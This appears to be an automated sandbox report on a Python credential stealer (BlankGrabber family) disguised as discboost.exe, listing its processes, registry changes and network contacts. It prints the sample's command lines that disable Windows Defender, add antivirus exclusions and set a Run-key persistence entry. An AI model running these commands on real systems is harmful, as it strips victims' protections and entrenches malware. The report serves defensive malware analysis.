Malware Analysis Report

2025-06-16 00:41

Sample ID 241110-1rt9wsvras
Target discboost.exe
SHA256 deb17b39d8bfb61c95dabdce0ad4b2000647557f8b3d678a34bc135707f5dc16
Tags
blankgrabber discovery execution persistence pyinstaller spyware stealer upx privilege_escalation
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

deb17b39d8bfb61c95dabdce0ad4b2000647557f8b3d678a34bc135707f5dc16

Threat Level: Known bad

The file discboost.exe was found to be: Known bad.

Malicious Activity Summary

blankgrabber discovery execution persistence pyinstaller spyware stealer upx privilege_escalation

A stealer written in Python and packaged with Pyinstaller

Blankgrabber family

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Adds Run key to start application

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

UPX packed file

Enumerates processes with tasklist

Browser Information Discovery

Detects Pyinstaller

Event Triggered Execution: Netsh Helper DLL

System Network Configuration Discovery: Wi-Fi Discovery

Modifies registry key

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-10 21:53

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-10 21:53

Reported

2024-11-10 21:54

Platform

win10ltsc2021-20241023-fr

Max time kernel

30s

Max time network

38s

Command Line

"C:\Users\Admin\AppData\Local\Temp\discboost.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\empyrean = "C:\\Users\\Admin\\AppData\\Roaming\\empyrean\\run.bat" C:\Windows\system32\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipapi.co N/A N/A
N/A ipapi.co N/A N/A
N/A ipapi.co N/A N/A
N/A ip-api.com N/A N/A
N/A ipapi.co N/A N/A
N/A ipapi.co N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\wbem\WMIC.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2956 wrote to memory of 236 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Users\Admin\AppData\Local\Temp\discboost.exe
PID 2956 wrote to memory of 236 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Users\Admin\AppData\Local\Temp\discboost.exe
PID 236 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 236 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4476 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1656 wrote to memory of 696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1656 wrote to memory of 696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1424 wrote to memory of 2160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1424 wrote to memory of 2160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2848 wrote to memory of 3464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2848 wrote to memory of 3464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1816 wrote to memory of 1340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1816 wrote to memory of 1340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1904 wrote to memory of 4392 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 1904 wrote to memory of 4392 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 4392 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 4392 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 4364 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4364 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4364 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4364 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 1524 wrote to memory of 1152 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1524 wrote to memory of 1152 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 4364 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4364 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 3324 wrote to memory of 1364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3324 wrote to memory of 1364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4364 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4364 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 2512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4844 wrote to memory of 2512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4364 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4364 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 5056 wrote to memory of 2416 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 5056 wrote to memory of 2416 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 4364 wrote to memory of 4316 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4364 wrote to memory of 4316 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4316 wrote to memory of 3600 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 4316 wrote to memory of 3600 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 4364 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4364 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 2820 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 4948 wrote to memory of 2820 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\discboost.exe

"C:\Users\Admin\AppData\Local\Temp\discboost.exe"

C:\Users\Admin\AppData\Local\Temp\discboost.exe

"C:\Users\Admin\AppData\Local\Temp\discboost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\discboost.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\discboost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f"

C:\Windows\system32\reg.exe

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f"

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 blank-m0lpq.in udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 ipapi.co udp
US 104.26.9.44:443 ipapi.co tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 44.9.26.104.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 232.137.159.162.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
